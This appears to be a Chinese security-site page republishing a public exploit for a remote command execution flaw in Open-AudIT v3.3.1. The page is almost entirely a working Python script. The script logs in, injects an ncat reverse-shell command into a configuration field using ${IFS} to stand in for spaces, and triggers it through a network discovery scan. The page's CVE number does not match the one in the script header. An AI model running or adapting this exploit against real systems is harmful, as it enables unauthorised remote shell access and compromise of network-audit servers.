menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right (CVE-2020-12078)Open-AudIT v3.3.1 远程命令执行漏洞 chevron_right (CVE-2020-12078)Open-AudIT v3.3.1 远程命令执行漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2020-12078)Open-AudIT v3.3.1 远程命令执行漏洞.md
    5.31 KB / 2021-07-15 19:58:38
        (CVE-2020-12078)Open-AudIT v3.3.1 远程命令执行漏洞
====================================================

一、漏洞简介
------------

二、漏洞影响
------------

Open-AudIT v3.3.1

三、复现过程
------------

![](./resource/(CVE-2020-12078)Open-AudITv3.3.1远程命令执行漏洞/media/rId24.png)

    OpenAudIT-postauth-rce.py
    #!/usr/bin/python3

    # Exploit Title: Open-AudIT Professional v3.3.1 Remote Code Execution
    # Date: 22/04/2020
    # Exploit Author: Askar (@mohammadaskar2)
    # CVE: CVE-2020-8813
    # Vendor Homepage: https://opmantek.com/
    # Version: v3.3.1
    # Tested on: Ubuntu 18.04 / PHP 7.2.24

    import requests
    import sys
    import warnings
    import random
    import string
    from bs4 import BeautifulSoup
    from urllib.parse import quote

    warnings.filterwarnings("ignore", category=UserWarning, module='bs4')


    if len(sys.argv) != 6:
        print("[~] Usage : ./openaudit-exploit.py url username password ip port")
        exit()

    url = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    ip = sys.argv[4]
    port = sys.argv[5]

    request = requests.session()

    def inject_payload():
        configuration_path = url+"/en/omk/open-audit/configuration/90"
        data = 'data={"data":{"id":"90","type":"configuration","attributes":{"value":";ncat${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s${IFS};"}}}' % (ip, port)
        request.patch(configuration_path, data)
        print("[+] Payload injected in settings")


    def start_discovery():
        discovery_path = url+"/en/omk/open-audit/discoveries/create"
        post_discovery_path = url+"/en/omk/open-audit/discoveries"
        scan_name = "".join([random.choice(string.ascii_uppercase) for i in range(10)])
        req = request.get(discovery_path)

        response = req.text
        soup = BeautifulSoup(response, "html5lib")
        token = soup.findAll('input')[5].get("value")
        buttons = soup.findAll("button")
        headers = {"Referer" : discovery_path}
        request_data = {
        "data[attributes][name]":scan_name,
        "data[attributes][other][subnet]":"10.10.10.1/24",
        "data[attributes][other][ad_server]":"",
        "data[attributes][other][ad_domain]":"",
        "submit":"",
        "data[type]":"discoveries",
        "data[access_token]":token,
        "data[attributes][complete]":"y",
        "data[attributes][org_id]":"1",
        "data[attributes][type]":"subnet",
        "data[attributes][devices_assigned_to_org]":"",
        "data[attributes][devices_assigned_to_location]":"",
        "data[attributes][other][nmap][discovery_scan_option_id]":"1",
        "data[attributes][other][nmap][ping]":"y",
        "data[attributes][other][nmap][service_version]":"n",
        "data[attributes][other][nmap][open|filtered]":"n",
        "data[attributes][other][nmap][filtered]":"n",
        "data[attributes][other][nmap][timing]":"4",
        "data[attributes][other][nmap][nmap_tcp_ports]":"0",
        "data[attributes][other][nmap][nmap_udp_ports]":"0",
        "data[attributes][other][nmap][tcp_ports]":"22,135,62078",
        "data[attributes][other][nmap][udp_ports]":"161",
        "data[attributes][other][nmap][timeout]":"",
        "data[attributes][other][nmap][exclude_tcp_ports]":"",
        "data[attributes][other][nmap][exclude_udp_ports]":"",
        "data[attributes][other][nmap][exclude_ip]":"",
        "data[attributes][other][nmap][ssh_ports]":"22",
        "data[attributes][other][match][match_dbus]":"",
        "data[attributes][other][match][match_fqdn]":"",
        "data[attributes][other][match][match_dns_fqdn]":"",
        "data[attributes][other][match][match_dns_hostname]":"",
        "data[attributes][other][match][match_hostname]":"",
        "data[attributes][other][match][match_hostname_dbus]":"",
        "data[attributes][other][match][match_hostname_serial]":"",
        "data[attributes][other][match][match_hostname_uuid]":"",
        "data[attributes][other][match][match_ip]":"",
        "data[attributes][other][match][match_ip_no_data]":"",
        "data[attributes][other][match][match_mac]":"",
        "data[attributes][other][match][match_mac_vmware]":"",
        "data[attributes][other][match][match_serial]":"",
        "data[attributes][other][match][match_serial_type]":"",
        "data[attributes][other][match][match_sysname]":"",
        "data[attributes][other][match][match_sysname_serial]":"",
        "data[attributes][other][match][match_uuid]":""

        }
        print("[+] Creating discovery ..")
        req = request.post(post_discovery_path, data=request_data, headers=headers, allow_redirects=False)
        disocvery_url = url + req.headers['Location'] + "/execute"
        print("[+] Triggering payload ..")
        print("[+] Check your nc ;)")
        request.get(disocvery_url)


    def login():
        login_info = {
        "redirect_url": "/en/omk/open-audit",
        "username": username,
        "password": password
        }
        login_request = request.post(url+"/en/omk/open-audit/login", login_info)
        login_text = login_request.text
        if "There was an error authenticating" in login_text:
            return False
        else:
            return True

    if login():
        print("[+] LoggedIn Successfully")
        inject_payload()
        start_discovery()
    else:
        print("[-] Cannot login!")
    links
    file_download